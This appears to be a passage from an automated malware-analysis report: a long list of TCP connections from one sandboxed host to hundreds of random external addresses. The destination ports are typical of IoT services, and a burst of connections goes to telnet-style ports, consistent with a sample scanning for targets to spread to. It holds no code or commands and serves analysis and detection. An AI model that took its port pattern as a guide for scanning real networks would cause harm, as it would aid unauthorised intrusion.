              Source: global trafficTCP traffic: 192.168.2.20:40778 -> 40.55.32.94:81
              Source: global trafficTCP traffic: 192.168.2.20:38816 -> 49.96.132.149:5555
              Source: global trafficTCP traffic: 192.168.2.20:44022 -> 20.125.190.187:49152
              Source: global trafficTCP traffic: 192.168.2.20:33334 -> 16.141.242.228:8080
              Source: global trafficTCP traffic: 192.168.2.20:44174 -> 62.250.85.170:5555
              Source: global trafficTCP traffic: 192.168.2.20:55818 -> 86.118.67.217:37215
              Source: global trafficTCP traffic: 192.168.2.20:57082 -> 139.232.194.9:7574
              Source: global trafficTCP traffic: 192.168.2.20:60086 -> 91.81.75.27:8443
              Source: global trafficTCP traffic: 192.168.2.20:46392 -> 136.183.108.224:52869
              Source: global trafficTCP traffic: 192.168.2.20:51792 -> 128.138.242.245:8443
              Source: global trafficTCP traffic: 192.168.2.20:33586 -> 145.160.209.254:5555
              Source: global trafficTCP traffic: 192.168.2.20:55430 -> 52.161.190.104:49152
              Source: global trafficTCP traffic: 192.168.2.20:39778 -> 85.121.215.74:8443
              Source: global trafficTCP traffic: 192.168.2.20:32806 -> 94.97.187.163:52869
              Source: global trafficTCP traffic: 192.168.2.20:51512 -> 201.243.109.202:8080
              Source: global trafficTCP traffic: 192.168.2.20:33938 -> 221.1.41.110:52869
              Source: global trafficTCP traffic: 192.168.2.20:57690 -> 149.104.161.39:8080
              Source: global trafficTCP traffic: 192.168.2.20:35422 -> 123.216.91.122:8443
              Source: global trafficTCP traffic: 192.168.2.20:49614 -> 4.118.127.11:8080
              Source: global trafficTCP traffic: 192.168.2.20:50850 -> 202.59.10.109:8443
              Source: global trafficTCP traffic: 192.168.2.20:45574 -> 92.184.72.221:7574
              Source: global trafficTCP traffic: 192.168.2.20:47266 -> 49.44.85.85:5555
              Source: global trafficTCP traffic: 192.168.2.20:52438 -> 167.1.169.103:37215
              Source: global trafficTCP traffic: 192.168.2.20:59122 -> 42.11.46.133:52869
              Source: global trafficTCP traffic: 192.168.2.20:34604 -> 118.173.235.22:8443
              Source: global trafficTCP traffic: 192.168.2.20:33216 -> 37.63.64.215:37215
              Source: global trafficTCP traffic: 192.168.2.20:50252 -> 19.205.39.28:8080
              Source: global trafficTCP traffic: 192.168.2.20:35820 -> 48.202.182.121:8080
              Source: global trafficTCP traffic: 192.168.2.20:53032 -> 24.173.205.153:8080
              Source: global trafficTCP traffic: 192.168.2.20:49528 -> 197.64.140.241:52869
              Source: global trafficTCP traffic: 192.168.2.20:54652 -> 189.161.71.91:52869
              Source: global trafficTCP traffic: 192.168.2.20:60480 -> 57.99.254.174:8080
              Source: global trafficTCP traffic: 192.168.2.20:35530 -> 4.22.190.7:81
              Source: global trafficTCP traffic: 192.168.2.20:33072 -> 184.71.180.110:49152
              Source: global trafficTCP traffic: 192.168.2.20:59348 -> 13.78.136.158:81
              Source: global trafficTCP traffic: 192.168.2.20:45142 -> 47.130.183.87:49152
              Source: global trafficTCP traffic: 192.168.2.20:42122 -> 133.34.124.224:7574
              Source: global trafficTCP traffic: 192.168.2.20:59514 -> 153.249.92.103:7574
              Source: global trafficTCP traffic: 192.168.2.20:52342 -> 98.63.16.128:7574
              Source: global trafficTCP traffic: 192.168.2.20:36338 -> 38.208.250.246:8080
              Source: global trafficTCP traffic: 192.168.2.20:56992 -> 214.89.182.196:8080
              Source: global trafficTCP traffic: 192.168.2.20:35682 -> 197.182.45.71:5555
              Source: global trafficTCP traffic: 192.168.2.20:34526 -> 135.37.73.197:52869
              Source: global trafficTCP traffic: 192.168.2.20:52478 -> 80.157.104.83:8443
              Source: global trafficTCP traffic: 192.168.2.20:39924 -> 106.61.88.206:52869
              Source: global trafficTCP traffic: 192.168.2.20:42408 -> 154.170.107.231:8080
              Source: global trafficTCP traffic: 192.168.2.20:48578 -> 218.244.38.188:7574
              Source: global trafficTCP traffic: 192.168.2.20:38690 -> 61.94.47.96:49152
              Source: global trafficTCP traffic: 192.168.2.20:41048 -> 27.134.142.192:7574
              Source: global trafficTCP traffic: 192.168.2.20:58762 -> 166.134.109.188:37215
              Source: global trafficTCP traffic: 192.168.2.20:59340 -> 49.129.128.6:5555
              Source: global trafficTCP traffic: 192.168.2.20:40468 -> 175.9.24.199:8080
              Source: global trafficTCP traffic: 192.168.2.20:40042 -> 84.209.208.168:52869
              Source: global trafficTCP traffic: 192.168.2.20:58356 -> 68.227.44.217:52869
              Source: global trafficTCP traffic: 192.168.2.20:53628 -> 211.55.43.132:7574
              Source: global trafficTCP traffic: 192.168.2.20:57586 -> 195.172.223.126:8080
              Source: global trafficTCP traffic: 192.168.2.20:56526 -> 96.203.33.213:52869
              Source: global trafficTCP traffic: 192.168.2.20:54568 -> 129.20.227.135:7574
              Source: global trafficTCP traffic: 192.168.2.20:55468 -> 9.172.203.181:8080
              Source: global trafficTCP traffic: 192.168.2.20:36304 -> 94.224.106.104:49152
              Source: global trafficTCP traffic: 192.168.2.20:40782 -> 120.118.238.58:52869
              Source: global trafficTCP traffic: 192.168.2.20:35460 -> 91.179.250.42:49152
              Source: global trafficTCP traffic: 192.168.2.20:36004 -> 52.199.115.5:37215
              Source: global trafficTCP traffic: 192.168.2.20:41788 -> 66.11.10.33:49152
              Source: global trafficTCP traffic: 192.168.2.20:47030 -> 72.17.101.201:49152
              Source: global trafficTCP traffic: 192.168.2.20:36790 -> 75.11.174.122:8080
              Source: global trafficTCP traffic: 192.168.2.20:56684 -> 35.24.18.228:81
              Source: global trafficTCP traffic: 192.168.2.20:48792 -> 158.130.59.239:8080
              Source: global trafficTCP traffic: 192.168.2.20:40750 -> 112.2.90.90:49152
              Source: global trafficTCP traffic: 192.168.2.20:48980 -> 20.108.48.51:81
              Source: global trafficTCP traffic: 192.168.2.20:46626 -> 180.248.40.176:8080
              Source: global trafficTCP traffic: 192.168.2.20:39450 -> 83.210.199.93:8080
              Source: global trafficTCP traffic: 192.168.2.20:37570 -> 216.75.1.172:8080
              Source: global trafficTCP traffic: 192.168.2.20:57302 -> 154.75.144.11:37215
              Source: global trafficTCP traffic: 192.168.2.20:52330 -> 14.129.240.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:55278 -> 37.62.41.226:8443
              Source: global trafficTCP traffic: 192.168.2.20:43200 -> 179.94.238.196:7574
              Source: global trafficTCP traffic: 192.168.2.20:57864 -> 33.158.63.251:8080
              Source: global trafficTCP traffic: 192.168.2.20:43228 -> 7.63.132.107:8080
              Source: global trafficTCP traffic: 192.168.2.20:57072 -> 99.187.208.35:8443
              Source: global trafficTCP traffic: 192.168.2.20:57792 -> 157.2.211.116:81
              Source: global trafficTCP traffic: 192.168.2.20:38030 -> 217.200.122.135:37215
              Source: global trafficTCP traffic: 192.168.2.20:56166 -> 219.46.197.199:8080
              Source: global trafficTCP traffic: 192.168.2.20:51372 -> 122.169.104.138:52869
              Source: global trafficTCP traffic: 192.168.2.20:60240 -> 164.100.107.31:81
              Source: global trafficTCP traffic: 192.168.2.20:45086 -> 96.118.108.130:81
              Source: global trafficTCP traffic: 192.168.2.20:53842 -> 220.75.159.53:81
              Source: global trafficTCP traffic: 192.168.2.20:48484 -> 218.93.19.234:49152
              Source: global trafficTCP traffic: 192.168.2.20:50000 -> 63.51.68.64:81
              Source: global trafficTCP traffic: 192.168.2.20:58058 -> 54.218.19.80:49152
              Source: global trafficTCP traffic: 192.168.2.20:51238 -> 59.218.244.213:8080
              Source: global trafficTCP traffic: 192.168.2.20:42194 -> 216.31.211.143:81
              Source: global trafficTCP traffic: 192.168.2.20:47668 -> 205.119.84.12:8080
              Source: global trafficTCP traffic: 192.168.2.20:48774 -> 146.210.131.27:37215
              Source: global trafficTCP traffic: 192.168.2.20:35780 -> 161.92.112.229:8080
              Source: global trafficTCP traffic: 192.168.2.20:34480 -> 111.212.139.145:8080
              Source: global trafficTCP traffic: 192.168.2.20:45426 -> 116.209.97.113:5555
              Source: global trafficTCP traffic: 192.168.2.20:51670 -> 146.164.113.65:52869
              Source: global trafficTCP traffic: 192.168.2.20:57216 -> 170.57.251.41:7574
              Source: global trafficTCP traffic: 192.168.2.20:60326 -> 46.131.230.49:8080
              Source: global trafficTCP traffic: 192.168.2.20:47292 -> 52.40.220.98:8080
              Source: global trafficTCP traffic: 192.168.2.20:42282 -> 133.90.62.93:52869
              Source: global trafficTCP traffic: 192.168.2.20:46356 -> 219.223.139.134:81
              Source: global trafficTCP traffic: 192.168.2.20:58656 -> 116.71.182.71:81
              Source: global trafficTCP traffic: 192.168.2.20:52016 -> 51.91.73.59:5555
              Source: global trafficTCP traffic: 192.168.2.20:60694 -> 14.52.177.146:49152
              Source: global trafficTCP traffic: 192.168.2.20:48610 -> 174.97.64.130:37215
              Source: global trafficTCP traffic: 192.168.2.20:36540 -> 84.72.187.149:37215
              Source: global trafficTCP traffic: 192.168.2.20:44250 -> 42.108.198.1:8080
              Source: global trafficTCP traffic: 192.168.2.20:44818 -> 7.251.184.10:49152
              Source: global trafficTCP traffic: 192.168.2.20:58920 -> 133.216.170.67:49152
              Source: global trafficTCP traffic: 192.168.2.20:52980 -> 135.228.27.91:5555
              Source: global trafficTCP traffic: 192.168.2.20:46192 -> 33.106.54.104:8080
              Source: global trafficTCP traffic: 192.168.2.20:54258 -> 191.217.221.203:7574
              Source: global trafficTCP traffic: 192.168.2.20:46038 -> 186.220.27.206:5555
              Source: global trafficTCP traffic: 192.168.2.20:49494 -> 48.58.5.136:7574
              Source: global trafficTCP traffic: 192.168.2.20:33494 -> 161.22.129.249:8080
              Source: global trafficTCP traffic: 192.168.2.20:34602 -> 189.49.236.220:8080
              Source: global trafficTCP traffic: 192.168.2.20:53052 -> 61.64.2.50:7574
              Source: global trafficTCP traffic: 192.168.2.20:50894 -> 97.6.36.159:8080
              Source: global trafficTCP traffic: 192.168.2.20:34592 -> 90.210.159.184:8080
              Source: global trafficTCP traffic: 192.168.2.20:35328 -> 117.12.79.28:49152
              Source: global trafficTCP traffic: 192.168.2.20:48168 -> 64.189.158.197:5555
              Source: global trafficTCP traffic: 192.168.2.20:55834 -> 27.122.236.15:7574
              Source: global trafficTCP traffic: 192.168.2.20:50506 -> 59.58.132.156:49152
              Source: global trafficTCP traffic: 192.168.2.20:34416 -> 65.247.63.177:81
              Source: global trafficTCP traffic: 192.168.2.20:35144 -> 135.143.229.69:7574
              Source: global trafficTCP traffic: 192.168.2.20:38000 -> 160.87.228.46:5555
              Source: global trafficTCP traffic: 192.168.2.20:55078 -> 68.152.79.70:8443
              Source: global trafficTCP traffic: 192.168.2.20:59972 -> 66.137.83.50:81
              Source: global trafficTCP traffic: 192.168.2.20:35398 -> 82.75.189.190:81
              Source: global trafficTCP traffic: 192.168.2.20:45164 -> 120.210.115.227:8080
              Source: global trafficTCP traffic: 192.168.2.20:52704 -> 156.94.186.125:8080
              Source: global trafficTCP traffic: 192.168.2.20:40054 -> 119.91.50.120:49152
              Source: global trafficTCP traffic: 192.168.2.20:53006 -> 205.210.8.73:52869
              Source: global trafficTCP traffic: 192.168.2.20:33180 -> 213.122.86.91:5555
              Source: global trafficTCP traffic: 192.168.2.20:51986 -> 12.241.220.138:37215
              Source: global trafficTCP traffic: 192.168.2.20:34178 -> 130.177.18.137:49152
              Source: global trafficTCP traffic: 192.168.2.20:41608 -> 4.245.217.94:8080
              Source: global trafficTCP traffic: 192.168.2.20:53206 -> 78.8.77.51:5555
              Source: global trafficTCP traffic: 192.168.2.20:59996 -> 150.45.123.229:49152
              Source: global trafficTCP traffic: 192.168.2.20:47406 -> 177.234.114.180:49152
              Source: global trafficTCP traffic: 192.168.2.20:44532 -> 219.216.64.252:5555
              Source: global trafficTCP traffic: 192.168.2.20:50594 -> 43.185.95.93:8080
              Source: global trafficTCP traffic: 192.168.2.20:45948 -> 116.177.55.129:52869
              Source: global trafficTCP traffic: 192.168.2.20:42988 -> 161.29.217.202:37215
              Source: global trafficTCP traffic: 192.168.2.20:60076 -> 161.60.53.154:8080
              Source: global trafficTCP traffic: 192.168.2.20:42918 -> 17.73.96.41:81
              Source: global trafficTCP traffic: 192.168.2.20:47268 -> 197.75.185.233:49152
              Source: global trafficTCP traffic: 192.168.2.20:57620 -> 81.37.238.179:8080
              Source: global trafficTCP traffic: 192.168.2.20:35414 -> 31.201.252.70:7574
              Source: global trafficTCP traffic: 192.168.2.20:58802 -> 22.231.115.48:5555
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 14.68.118.231:1023
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 164.148.132.78:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 153.183.139.146:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 5.161.45.2:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 122.34.192.0:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 168.48.143.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 135.183.180.114:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 48.151.83.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 194.179.4.211:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 221.132.106.104:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 170.186.136.235:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 85.192.60.167:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 107.69.230.46:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 75.62.125.164:1023
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 171.82.43.233:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 216.182.36.114:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 185.161.152.189:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 174.34.205.52:1023
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 70.236.96.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 84.66.149.132:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 179.115.125.39:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 61.166.150.169:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 116.107.255.254:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 180.169.240.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 217.22.202.14:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 98.25.246.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 114.53.240.254:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 117.61.145.5:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 84.99.185.217:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 194.166.99.241:1023
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 145.109.18.28:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 188.17.32.76:2323
              Source: global trafficTCP traffic: 192.168.2.20:45090 -> 169.184.176.176:2323
              Source: global trafficTCP traffic: 192.168.2.20:56066 -> 206.79.214.122:52869
              Source: global trafficTCP traffic: 192.168.2.20:48224 -> 139.43.104.61:37215
              Source: global trafficTCP traffic: 192.168.2.20:38472 -> 143.110.90.125:8080
              Source: global trafficTCP traffic: 192.168.2.20:43146 -> 132.178.20.58:81
              Source: global trafficTCP traffic: 192.168.2.20:60132 -> 164.87.95.100:8443
              Source: global trafficTCP traffic: 192.168.2.20:55710 -> 148.162.250.199:37215
              Source: global trafficTCP traffic: 192.168.2.20:49514 -> 98.82.199.19:8443
              Source: global trafficTCP traffic: 192.168.2.20:41472 -> 132.39.112.185:8080
              Source: global trafficTCP traffic: 192.168.2.20:60782 -> 2.84.46.201:81
              Source: global trafficTCP traffic: 192.168.2.20:44208 -> 139.163.247.157:8080
              Source: global trafficTCP traffic: 192.168.2.20:59058 -> 169.40.8.89:5555
              Source: global trafficTCP traffic: 192.168.2.20:51074 -> 120.150.59.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:55842 -> 222.77.219.12:5555
              Source: global trafficTCP traffic: 192.168.2.20:51944 -> 98.19.32.16:8080
              Source: global trafficTCP traffic: 192.168.2.20:56180 -> 100.146.200.249:5555
              Source: global trafficTCP traffic: 192.168.2.20:42634 -> 151.37.83.166:37215
              Source: global trafficTCP traffic: 192.168.2.20:59772 -> 183.247.235.167:5555
              Source: global trafficTCP traffic: 192.168.2.20:59266 -> 201.211.65.138:52869
              Source: global trafficTCP traffic: 192.168.2.20:56382 -> 117.250.174.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:37006 -> 20.4.186.191:8080
              Source: global trafficTCP traffic: 192.168.2.20:54738 -> 49.216.4.117:8080
              Source: global trafficTCP traffic: 192.168.2.20:49914 -> 217.107.92.58:5555
              Source: global trafficTCP traffic: 192.168.2.20:45968 -> 209.91.223.5:49152
              Source: global trafficTCP traffic: 192.168.2.20:58442 -> 133.150.36.64:81
              Source: global trafficTCP traffic: 192.168.2.20:40466 -> 11.10.40.243:8080
              Source: global trafficTCP traffic: 192.168.2.20:41956 -> 220.206.246.179:49152
              Source: global trafficTCP traffic: 192.168.2.20:55878 -> 141.121.59.188:8080
              Source: global trafficTCP traffic: 192.168.2.20:59474 -> 206.169.28.179:8443
              Source: global trafficTCP traffic: 192.168.2.20:45706 -> 24.132.250.120:37215
              Source: global trafficTCP traffic: 192.168.2.20:59976 -> 18.193.82.36:8080
              Source: global trafficTCP traffic: 192.168.2.20:34368 -> 114.8.59.239:8080
              Source: global trafficTCP traffic: 192.168.2.20:49544 -> 71.213.157.134:49152
              Source: global trafficTCP traffic: 192.168.2.20:60940 -> 80.201.9.77:49152
              Source: global trafficTCP traffic: 192.168.2.20:49528 -> 121.98.76.63:37215
              Source: global trafficTCP traffic: 192.168.2.20:32942 -> 14.27.161.132:37215
              Source: global trafficTCP traffic: 192.168.2.20:34198 -> 54.52.13.202:8080
              Source: global trafficTCP traffic: 192.168.2.20:45138 -> 15.53.225.155:7574
              Source: global trafficTCP traffic: 192.168.2.20:50864 -> 133.38.31.193:8080
              Source: global trafficTCP traffic: 192.168.2.20:58466 -> 49.218.119.115:81
              Source: global trafficTCP traffic: 192.168.2.20:35636 -> 103.74.156.80:8080
              Source: global trafficTCP traffic: 192.168.2.20:52908 -> 2.129.77.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:56384 -> 177.203.133.112:5555
              Source: global trafficTCP traffic: 192.168.2.20:51268 -> 34.79.180.38:37215
              Source: global trafficTCP traffic: 192.168.2.20:34662 -> 19.128.141.198:81
              Source: global trafficTCP traffic: 192.168.2.20:48620 -> 185.61.14.146:37215
              Source: global trafficTCP traffic: 192.168.2.20:53884 -> 39.192.165.164:49152
              Source: global trafficTCP traffic: 192.168.2.20:56672 -> 104.94.125.179:8080
              Source: global trafficTCP traffic: 192.168.2.20:38274 -> 124.57.207.32:8443
              Source: global trafficTCP traffic: 192.168.2.20:54200 -> 76.94.216.22:37215
              Source: global trafficTCP traffic: 192.168.2.20:47530 -> 194.82.200.72:37215
              Source: global trafficTCP traffic: 192.168.2.20:43750 -> 100.166.22.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:46322 -> 108.232.119.42:52869
              Source: global trafficTCP traffic: 192.168.2.20:42048 -> 19.63.161.92:7574
              Source: global trafficTCP traffic: 192.168.2.20:60118 -> 140.201.154.174:5555
              Source: global trafficTCP traffic: 192.168.2.20:42312 -> 202.47.233.125:52869
              Source: global trafficTCP traffic: 192.168.2.20:50440 -> 163.252.150.224:49152
              Source: global trafficTCP traffic: 192.168.2.20:42798 -> 47.205.159.249:49152
              Source: global trafficTCP traffic: 192.168.2.20:33812 -> 97.79.190.46:8080
              Source: global trafficTCP traffic: 192.168.2.20:47742 -> 193.229.210.90:52869
              Source: global trafficTCP traffic: 192.168.2.20:40988 -> 165.123.198.53:81
              Source: global trafficTCP traffic: 192.168.2.20:39100 -> 178.232.217.232:52869
              Source: global trafficTCP traffic: 192.168.2.20:34048 -> 189.144.128.178:5555
              Source: global trafficTCP traffic: 192.168.2.20:46030 -> 137.189.214.33:8443
              Source: global trafficTCP traffic: 192.168.2.20:45134 -> 120.166.53.75:7574
              Source: global trafficTCP traffic: 192.168.2.20:58870 -> 188.36.241.166:81
              Source: global trafficTCP traffic: 192.168.2.20:52536 -> 57.36.162.225:37215
              Source: global trafficTCP traffic: 192.168.2.20:33892 -> 21.235.195.37:52869
              Source: global trafficTCP traffic: 192.168.2.20:48214 -> 49.108.152.99:5555
              Source: global trafficTCP traffic: 192.168.2.20:55560 -> 128.190.19.186:5555
              Source: global trafficTCP traffic: 192.168.2.20:45624 -> 74.219.227.124:81
              Source: global trafficTCP traffic: 192.168.2.20:47868 -> 147.138.192.17:37215
              Source: global trafficTCP traffic: 192.168.2.20:40840 -> 75.189.55.206:52869
              Source: global trafficTCP traffic: 192.168.2.20:55110 -> 50.247.39.46:37215
              Source: global trafficTCP traffic: 192.168.2.20:36608 -> 186.218.134.111:7574
              Source: global trafficTCP traffic: 192.168.2.20:41524 -> 149.212.155.111:49152
              Source: global trafficTCP traffic: 192.168.2.20:40636 -> 2.75.39.125:8080
              Source: global trafficTCP traffic: 192.168.2.20:32982 -> 60.214.246.235:7574
              Source: global trafficTCP traffic: 192.168.2.20:44232 -> 168.218.233.120:8080
              Source: global trafficTCP traffic: 192.168.2.20:45194 -> 76.221.238.163:8443
              Source: global trafficTCP traffic: 192.168.2.20:59288 -> 45.68.141.187:8080
              Source: global trafficTCP traffic: 192.168.2.20:49960 -> 164.202.240.135:7574
              Source: global trafficTCP traffic: 192.168.2.20:43290 -> 218.59.80.132:5555
              Source: global trafficTCP traffic: 192.168.2.20:34398 -> 221.116.41.88:7574
              Source: global trafficTCP traffic: 192.168.2.20:41456 -> 156.173.198.61:7574
              Source: global trafficTCP traffic: 192.168.2.20:35036 -> 210.217.175.171:7574
              Source: global trafficTCP traffic: 192.168.2.20:56112 -> 13.79.188.4:49152
              Source: global trafficTCP traffic: 192.168.2.20:45248 -> 150.142.183.220:37215
              Source: global trafficTCP traffic: 192.168.2.20:56644 -> 141.244.16.122:7574
              Source: global trafficTCP traffic: 192.168.2.20:53118 -> 186.103.97.125:81
              Source: global trafficTCP traffic: 192.168.2.20:35448 -> 103.196.9.119:37215
              Source: global trafficTCP traffic: 192.168.2.20:39864 -> 57.70.195.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:42412 -> 7.127.210.197:8443
              Source: global trafficTCP traffic: 192.168.2.20:45066 -> 140.126.213.100:8080
              Source: global trafficTCP traffic: 192.168.2.20:38624 -> 93.102.154.208:7574
              Source: global trafficTCP traffic: 192.168.2.20:36466 -> 14.209.121.58:5555
              Source: global trafficTCP traffic: 192.168.2.20:50296 -> 198.94.178.173:8080
              Source: global trafficTCP traffic: 192.168.2.20:49110 -> 128.214.130.86:37215
              Source: global trafficTCP traffic: 192.168.2.20:49378 -> 161.95.84.239:49152
              Source: global trafficTCP traffic: 192.168.2.20:59012 -> 180.95.166.6:7574
              Source: global trafficTCP traffic: 192.168.2.20:50268 -> 126.145.155.11:8080
              Source: global trafficTCP traffic: 192.168.2.20:50326 -> 97.214.218.204:8443
              Source: global trafficTCP traffic: 192.168.2.20:57272 -> 201.137.113.90:7574
              Source: global trafficTCP traffic: 192.168.2.20:36312 -> 155.10.81.73:81
              Source: global trafficTCP traffic: 192.168.2.20:44506 -> 72.153.111.43:52869
              Source: global trafficTCP traffic: 192.168.2.20:33122 -> 100.134.89.123:37215
              Source: global trafficTCP traffic: 192.168.2.20:45624 -> 124.1.3.78:81
              Source: global trafficTCP traffic: 192.168.2.20:57720 -> 63.125.68.17:37215
              Source: global trafficTCP traffic: 192.168.2.20:36848 -> 106.214.110.94:8080
              Source: global trafficTCP traffic: 192.168.2.20:41234 -> 196.97.252.233:8080
              Source: global trafficTCP traffic: 192.168.2.20:48156 -> 111.18.246.102:5555
              Source: global trafficTCP traffic: 192.168.2.20:55514 -> 90.175.58.51:8443
              Source: global trafficTCP traffic: 192.168.2.20:49138 -> 139.223.146.63:81
              Source: global trafficTCP traffic: 192.168.2.20:44616 -> 6.47.161.79:52869
              Source: global trafficTCP traffic: 192.168.2.20:53498 -> 19.35.140.38:52869
              Source: global trafficTCP traffic: 192.168.2.20:55680 -> 31.237.51.135:8080
              Source: global trafficTCP traffic: 192.168.2.20:46996 -> 13.131.172.243:8080
              Source: global trafficTCP traffic: 192.168.2.20:51696 -> 150.180.237.213:49152
              Source: global trafficTCP traffic: 192.168.2.20:47798 -> 198.126.3.49:52869
              Source: global trafficTCP traffic: 192.168.2.20:53892 -> 101.243.205.98:8080
              Source: global trafficTCP traffic: 192.168.2.20:60562 -> 71.4.197.241:52869
              Source: global trafficTCP traffic: 192.168.2.20:43640 -> 78.67.181.55:8080
              Source: global trafficTCP traffic: 192.168.2.20:50966 -> 71.22.117.26:37215
              Source: global trafficTCP traffic: 192.168.2.20:45298 -> 210.253.166.196:5555
              Source: global trafficTCP traffic: 192.168.2.20:58316 -> 217.156.45.91:8080
              Source: global trafficTCP traffic: 192.168.2.20:45530 -> 69.131.25.50:8080
              Source: global trafficTCP traffic: 192.168.2.20:46346 -> 167.134.182.74:81
              Source: global trafficTCP traffic: 192.168.2.20:53484 -> 162.85.63.56:49152
              Source: global trafficTCP traffic: 192.168.2.20:57220 -> 40.40.5.248:49152
              Source: global trafficTCP traffic: 192.168.2.20:45068 -> 150.250.137.224:52869
              Source: global trafficTCP traffic: 192.168.2.20:53948 -> 20.194.139.143:37215
              Source: global trafficTCP traffic: 192.168.2.20:50320 -> 201.150.28.32:5555
              Source: global trafficTCP traffic: 192.168.2.20:59572 -> 146.204.28.33:37215
              Source: global trafficTCP traffic: 192.168.2.20:42558 -> 59.163.54.53:81
              Source: global trafficTCP traffic: 192.168.2.20:37544 -> 122.180.52.190:49152
              Source: global trafficTCP traffic: 192.168.2.20:34618 -> 17.77.32.32:8080
              Source: global trafficTCP traffic: 192.168.2.20:36520 -> 111.88.119.30:52869
              Source: global trafficTCP traffic: 192.168.2.20:47824 -> 170.14.175.37:7574
              Source: global trafficTCP traffic: 192.168.2.20:50780 -> 180.81.233.206:8080
              Source: global trafficTCP traffic: 192.168.2.20:55872 -> 202.30.107.204:37215
              Source: global trafficTCP traffic: 192.168.2.20:55682 -> 159.1.131.236:8080
              Source: global trafficTCP traffic: 192.168.2.20:60566 -> 28.46.159.218:37215
              Source: global trafficTCP traffic: 192.168.2.20:46624 -> 16.186.36.13:8443
              Source: global trafficTCP traffic: 192.168.2.20:57220 -> 41.198.51.208:52869
              Source: global trafficTCP traffic: 192.168.2.20:58832 -> 96.208.251.9:37215
              Source: global trafficTCP traffic: 192.168.2.20:47568 -> 175.244.146.57:52869
              Source: global trafficTCP traffic: 192.168.2.20:46752 -> 218.229.107.98:52869
              Source: global trafficTCP traffic: 192.168.2.20:37570 -> 66.131.138.161:52869
              Source: global trafficTCP traffic: 192.168.2.20:35098 -> 182.238.3.204:8080
              Source: global trafficTCP traffic: 192.168.2.20:33190 -> 196.104.68.208:49152
              Source: global trafficTCP traffic: 192.168.2.20:60542 -> 31.54.2.103:8080
              Source: global trafficTCP traffic: 192.168.2.20:38844 -> 71.80.13.69:8443
              Source: global trafficTCP traffic: 192.168.2.20:38518 -> 98.146.234.218:52869
              Source: global trafficTCP traffic: 192.168.2.20:42736 -> 42.158.188.250:8443
              Source: global trafficTCP traffic: 192.168.2.20:46752 -> 52.124.66.249:49152
              Source: global trafficTCP traffic: 192.168.2.20:56666 -> 112.175.198.136:37215
              Source: global trafficTCP traffic: 192.168.2.20:53218 -> 65.97.144.41:7574
              Source: global trafficTCP traffic: 192.168.2.20:42716 -> 27.188.102.35:8443
              Source: global trafficTCP traffic: 192.168.2.20:48224 -> 16.27.248.127:8443
              Source: global trafficTCP traffic: 192.168.2.20:51760 -> 112.225.227.13:8080
              Source: global trafficTCP traffic: 192.168.2.20:44878 -> 22.160.204.61:5555
              Source: global trafficTCP traffic: 192.168.2.20:55630 -> 118.61.155.193:7574
              Source: global trafficTCP traffic: 192.168.2.20:48110 -> 78.17.25.87:37215
              Source: global trafficTCP traffic: 192.168.2.20:38248 -> 77.51.155.51:7574
              Source: global trafficTCP traffic: 192.168.2.20:37170 -> 115.37.92.222:81
              Source: global trafficTCP traffic: 192.168.2.20:38840 -> 131.89.133.126:8080
              Source: global trafficTCP traffic: 192.168.2.20:35668 -> 27.65.122.200:8080
              Source: global trafficTCP traffic: 192.168.2.20:37244 -> 86.219.35.70:8080
              Source: global trafficTCP traffic: 192.168.2.20:53402 -> 67.54.192.184:52869
              Source: global trafficTCP traffic: 192.168.2.20:33678 -> 180.4.220.82:7574
              Source: global trafficTCP traffic: 192.168.2.20:57596 -> 181.38.107.98:52869
              Source: global trafficTCP traffic: 192.168.2.20:53784 -> 44.81.27.36:8080
              Source: global trafficTCP traffic: 192.168.2.20:36966 -> 216.53.201.70:81
              Source: global trafficTCP traffic: 192.168.2.20:56388 -> 29.112.105.90:8080
              Source: global trafficTCP traffic: 192.168.2.20:48784 -> 82.161.10.44:7574
              Source: global trafficTCP traffic: 192.168.2.20:59670 -> 43.171.112.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:34628 -> 162.220.154.103:81
              Source: global trafficTCP traffic: 192.168.2.20:51800 -> 149.233.217.118:37215
              Source: global trafficTCP traffic: 192.168.2.20:34092 -> 68.239.197.132:52869
              Source: global trafficTCP traffic: 192.168.2.20:45598 -> 90.236.155.169:81
              Source: global trafficTCP traffic: 192.168.2.20:54242 -> 147.201.218.189:7574
              Source: global trafficTCP traffic: 192.168.2.20:40092 -> 94.226.21.238:8443
